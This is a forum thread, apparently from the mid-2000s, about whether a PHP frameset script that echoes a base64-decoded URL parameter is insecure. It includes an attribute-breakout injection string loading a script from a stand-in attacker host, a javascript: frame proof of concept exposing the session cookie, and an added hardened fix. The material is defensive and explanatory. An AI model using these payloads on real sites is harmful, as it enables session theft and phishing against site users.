Does this php script cause a security hole?

  • jasonbrown1999@yahoo.co.uk

    Does this php script cause a security hole?

    Someone told me the following script could be used to run harmful
    commands on the server, by passing commands into the script. What the
    script does is encode an affiliate URL, create two frames, with the
    affiliate URL decoded and placed in the bottom URL. The top frame
    contains http://www.domain.com/selectanothercard.html for navigation
    back to the originating site.

    The script is accessed with a link like this:

    <a href="sendcard.php?url=<? echo
    base64_encode("http://affiliateurl.com/ecards/fourthjuly11107/index.php?en=1&aid=12345");
    ?>" target=_top>Send Card</a>

    The affiliate URL is first encoded, because otherwise it breaks (the
    ampersands cause problems). I tried another frame re-directing script,
    but it wouldn't carry through the affiliate info properly, so someone
    created this php script to encode/decode and create the frames.

    Could this script be used to send harmful commands to the server? If
    so, is there any way of modifying the script to fix that? Perhaps there
    are other alternatives to passing an affiliate URL into a frame like
    this script does?

    Jason

    <html>
    <head>
    <title></title>
    <meta http-equiv="Content-Type" content="text/html;
    charset=iso-8859-1">
    </head>
    <frameset rows="50,*" cols="*" framespacing="0" frameborder="NO"
    border="0">
    <frame src="http://www.domain.com/selectanothercard.html"
    name="topFrame" scrolling="NO" noresize>
    <frame src="<? echo base64_decode($url); ?>" name="mainFrame">
    </frameset>
    <noframes>
    <body>
    Your browser does not support frames.
    </body>
    </noframes>
    </html>

    <?
    //////////////////////////////////////////////////////////////////////////////
    // NOTES
    //////////////////////////////////////////////////////////////////////////////
    /*

    HOW TO LINK TO THIS FRAMESET
    ----------------------------

    * Your document that contains the links, must have the file extension
    .php

    EXAMPLE LINK:

    <a href="sendcard.php?url=<? echo
    base64_encode("http://affiliateurl.com/ecards/fourthjuly11107/index.php?en=1&aid=12345");
    ?>" target=_top>Send Card</a>

    */

    //////////////////////////////////////////////////////////////////////////////
    // END NOTES
    //////////////////////////////////////////////////////////////////////////////
    ?>

  • Aidan

    #2
    Re: Does this php script cause a security hole?

    No security issues that I can see (though I wouldn't take my word alone), as
    it doesn't take any input from the user apart from clicking the link, which
    is not handled by PHP anyway...

    HTH

    <jasonbrown1999@yahoo.co.uk> wrote in message
    news:1105662298.516750.230480@z14g2000cwz.googlegroups.com...



    • Aidan

      #3
      Re: Does this php script cause a security hole?

      On second inspection, there may be an issue if you have register globals
      enabled... this is because of this code:

      <? echo base64_decode($url); ?>

      If you have register_globals enabled on your web-server, then an attacker
      could put data into the $url variable via the URL, which is bad... In order
      to fix it, I recommend sanitizing the $url var before you use it (maybe even
      after you've decoded it), then once you've sanitized the input, embed it
      into the href attribute of the <a> tag.

      HTH

      "Aidan" <nospam.aidan@linknet.com.au> wrote in message
      news:newscache$79baai$bnc$1@titan.linknet.com.au...



      • Chung Leong

        #4
        Re: Does this php script cause a security hole?

        <jasonbrown1999@yahoo.co.uk> wrote in message
        news:1105662298.516750.230480@z14g2000cwz.googlegroups.com...
        > Someone told me the following script could be used to run harmful
        > commands on the server, by passing commands into the script. What the
        > script does is encode an affiliate URL, create two frames, with the
        > affiliate URL decoded and placed in the bottom URL. The top frame
        > contains http://www.domain.com/selectanothercard.html for navigation
        > back to the originating site.
        >

        I don't see any server side problem either. There could be a cross-site
        scripting vulnerability in the code though. If I email the following url to
        unsuspecting users of your site:

        http://whatever.net/sendcard.php?url...ocument.cookie)

        then I can potentially steal the cookie (PHP session id et al) when they
        click on the link. I'm hedging my response a bit, because Javascript
        execution is more limited in a frameset page. I'm 90% sure though that the
        browser would run the JS snippet in the URL.

        There's almost a potential for a phishing attack.



        • Rick

          #5
          Re: Does this php script cause a security hole?

          jasonbrown1999@yahoo.co.uk wrote:

          > Someone told me the following script could be used to run harmful
          > commands on the server, by passing commands into the script.

          If in doubt, assume your code is insecure.

          Basic rule of thumb is "Never use variables that come from the client for
          anything without checking them first." (especially the querystring, as it's
          the first place someone will try to tinker)

          --

          Rick

          Digital Printing
          www.intelligence-direct.com - 01270 215550


          • Dani CS

            #6
            Re: Does this php script cause a security hole?

            jasonbrown1999@yahoo.co.uk wrote:
            > Someone told me the following script could be used to run harmful
            > commands on the server, by passing commands into the script. What the
            > script does is encode an affiliate URL, create two frames, with the
            > affiliate URL decoded and placed in the bottom URL. The top frame
            > contains http://www.domain.com/selectanothercard.html for navigation
            > back to the originating site.

            I'd rather use the 'Back' button in my browser.
            >
            > The script is accessed with a link like this:
            >
            > <a href="sendcard.php?url=<? echo
            > base64_encode("http://affiliateurl.com/ecards/fourthjuly11107/index.php?en=1&aid=12345");
            > ?>" target=_top>Send Card</a>
            >
            > The affiliate URL is first encoded, because otherwise it breaks (the
            > ampersands cause problems). I tried another frame re-directing script,
            > but it wouldn't carry through the affiliate info properly, so someone
            > created this php script to encode/decode and create the frames.

            With htmlspecialchars() you get a shorter encoding.
            >
            > Could this script be used to send harmful commands to the server? If
            > so, is there any way of modifying the script to fix that? Perhaps there
            > are other alternatives to passing an affiliate URL into a frame like
            > this script does?
            >
            > Jason
            >
            > <html>
            > <head>
            > <title></title>
            > <meta http-equiv="Content-Type" content="text/html;
            > charset=iso-8859-1">
            > </head>
            > <frameset rows="50,*" cols="*" framespacing="0" frameborder="NO"
            > border="0">
            > <frame src="http://www.domain.com/selectanothercard.html"
            > name="topFrame" scrolling="NO" noresize>
            > <frame src="<? echo base64_decode($url); ?>" name="mainFrame">

            Suppose that base64_decode($url) decodes to the following:

            "></frameset> <script
            src="http://www.badguy.com/nasty_thing.js" ></script><input type="hidden"
            value="

            (note that the first quotes will close the starting quotes from <frame
            src=" and then the <input> will leave open quotes that match the ending
            quote of <frame src="...">)

            The resulting HTML sent to the browser would be:

            ....
            <frame src=""></frameset> <script
            src="http://www.badguy.com/nasty_thing.js" ></script><input type="hidden"
            value="" name="mainFrame ">
            ....


            In that case your frameset HTML code will be compromised (nasty_thing.js
            could do things like rewriting your documents, or loading a URL of its
            choice into any of them [however, the browser might set some
            restrictions for scripts belonging to another domain name]).

            The fix is simple: use htmlspecialchars(base64_decode($url)). The quotes
            will be replaced by &quot; and the processed HTML code will look like:

            <frame src="&quot;&gt; &lt;/frameset&gt; &lt;script
            src=&quot;http://www.badguy.com/nasty_thing.js...t&gt;&lt;input
            type=&quot;hidden&quot; value=&quot;" name="mainFrame">
            ....

            which will confuse the browser (invalid URL for src) but nothing else.


            > </frameset>
            > <noframes>
            > <body>
            > Your browser does not support frames.

            You should try your best to deliver useful content to the user.
            > </body>
            > </noframes>
            > </html>
            >
            <snip>


            • jasonbrown1999@yahoo.co.uk

              #7
              Re: Does this php script cause a security hole?

              > I'd rather use the 'Back' button in my broswer.

              That would have been simpler, but it requires 2 clicks to get back to
              my site, otherwise you're sent forwards again, because of how the
              affiliate program is set up.

              The altered script looks like the following? I don't need to adjust the
              'encode' URL as well?

              <frame src="<? echo htmlspecialchars(base64_decode($url)); ?>"
              name="mainFrame">
              </frameset>

              Jason


              • Chung Leong

                #8
                Re: Does this php script cause a security hole?

                "Chung Leong" <chernyshevsky@hotmail.com> wrote in message
                news:e5Kdndu1zeMGr3rcRVn-sw@comcast.com...
                > <jasonbrown1999@yahoo.co.uk> wrote in message
                > news:1105662298.516750.230480@z14g2000cwz.googlegroups.com...
                > > Someone told me the following script could be used to run harmful
                > > commands on the server, by passing commands into the script. What the
                > > script does is encode an affiliate URL, create two frames, with the
                > > affiliate URL decoded and placed in the bottom URL. The top frame
                > > contains http://www.domain.com/selectanothercard.html for navigation
                > > back to the originating site.
                > >
                >
                > I don't see any server side problem either. There could be a cross-site
                > scripting vulnerability in the code though. If I email the following url
                > to unsuspecting users of your site:
                >
                > http://whatever.net/sendcard.php?url...ocument.cookie)
                >
                > then I can potentially steal the cookie (PHP session id et al) when they
                > click on the link. I'm hedging my response a bit, because Javascript
                > execution is more limited in a frameset page. I'm 90% sure though that the
                > browser would run the JS snippet in the URL.
                >
                > There's almost a potential for a phishing attack.
                >

                Yup, it does work. The following code will bring up the PHP session id:

                <? session_start(); ?>
                <frameset rows="50,50">
                <frame src="http://localhost/test/info.php">
                <frame src="javascript: alert(parent.document.cookie);">
                </frameset>

                To actually exploit it, someone would replace alert() with code that sends
                the cookie to another web site.
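A hardened sendcard.php, written as an added example for this thread (not code from any of the posters), that covers both Dani CS's quote breakout and Chung Leong's javascript: frame source, which htmlspecialchars() alone does not stop. It assumes PHP 7.1 or later and uses affiliateurl.com as a placeholder for the host the card links actually point to.

```php
<?php
// Added example, not from the thread: hardened replacement for sendcard.php.
// Two separate checks are needed: validating the decoded URL (scheme and host)
// stops javascript: and off-site targets; escaping for the attribute context
// stops quotes from closing src="..." and injecting markup.

// Assumption: the only affiliate host the card links are allowed to open.
const ALLOWED_HOSTS = ['affiliateurl.com'];

/**
 * Decode the base64 "url" parameter and return it only if it is an
 * http(s) URL on an allowed host; otherwise return null.
 */
function safe_affiliate_url(string $encoded): ?string
{
    // Strict mode rejects anything outside the base64 alphabet.
    $decoded = base64_decode($encoded, true);
    if ($decoded === false) {
        return null;
    }
    $parts = parse_url($decoded);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return null;   // javascript:alert(...) has no host and is rejected here
    }
    // Scheme allowlist: blocks javascript:, data:, vbscript: and the like.
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return null;
    }
    // Host allowlist: keeps the page from framing an arbitrary (phishing) site.
    if (!in_array(strtolower($parts['host']), ALLOWED_HOSTS, true)) {
        return null;
    }
    return $decoded;
}

// Read the parameter explicitly instead of relying on register_globals.
$target = safe_affiliate_url($_GET['url'] ?? '');
if ($target === null) {
    header('HTTP/1.0 400 Bad Request');
    exit('Invalid card link.');
}
// Escape for the attribute context so a quote cannot close src="...".
$safe_src = htmlspecialchars($target, ENT_QUOTES, 'ISO-8859-1');
?>
<html>
<head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>
<frameset rows="50,*" cols="*" framespacing="0" frameborder="NO" border="0">
<frame src="http://www.domain.com/selectanothercard.html" name="topFrame" scrolling="NO" noresize>
<frame src="<?php echo $safe_src; ?>" name="mainFrame">
</frameset>
<noframes>
<body>
Your browser does not support frames.
</body>
</noframes>
</html>
```

The linking page should still urlencode() the base64 string when it builds the href, since "+" and "=" are not safe in a query string and would otherwise corrupt the decoded URL.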




                • CJ Llewellyn

                  #9
                  Re: Does this php script cause a security hole?

                  <jasonbrown1999@yahoo.co.uk> wrote in message
                  news:1105662298.516750.230480@z14g2000cwz.googlegroups.com...
                  > Someone told me the following script could be used to run harmful
                  > commands on the server, by passing commands into the script. What the
                  > script does is encode an affiliate URL, create two frames, with the
                  > affiliate URL decoded and placed in the bottom URL. The top frame
                  > contains http://www.domain.com/selectanothercard.html for navigation
                  > back to the originating site.
                  >
                  > The script is accessed with a link like this:
                  >
                  > <a href="sendcard.php?url=<? echo
                  > base64_encode("http://affiliateurl.com/ecards/fourthjuly11107/index.php?en=1&aid=12345");
                  > ?>" target=_top>Send Card</a>
                  >
                  > The affiliate URL is first encoded, because otherwise it breaks (the
                  > ampersands cause problems). I tried another frame re-directing script,
                  > but it wouldn't carry through the affiliate info properly, so someone
                  > created this php script to encode/decode and create the frames.

                  And your problem with using urlencode is? Furthermore, is it really necessary
                  to send all that information to your server via a URL?
                  > Could this script be used to send harmful commands to the server?

                  Yes, but the problem does not rest with the affiliate script, it depends on
                  what the script (sendcard.php) that processes the link does with the
                  information.


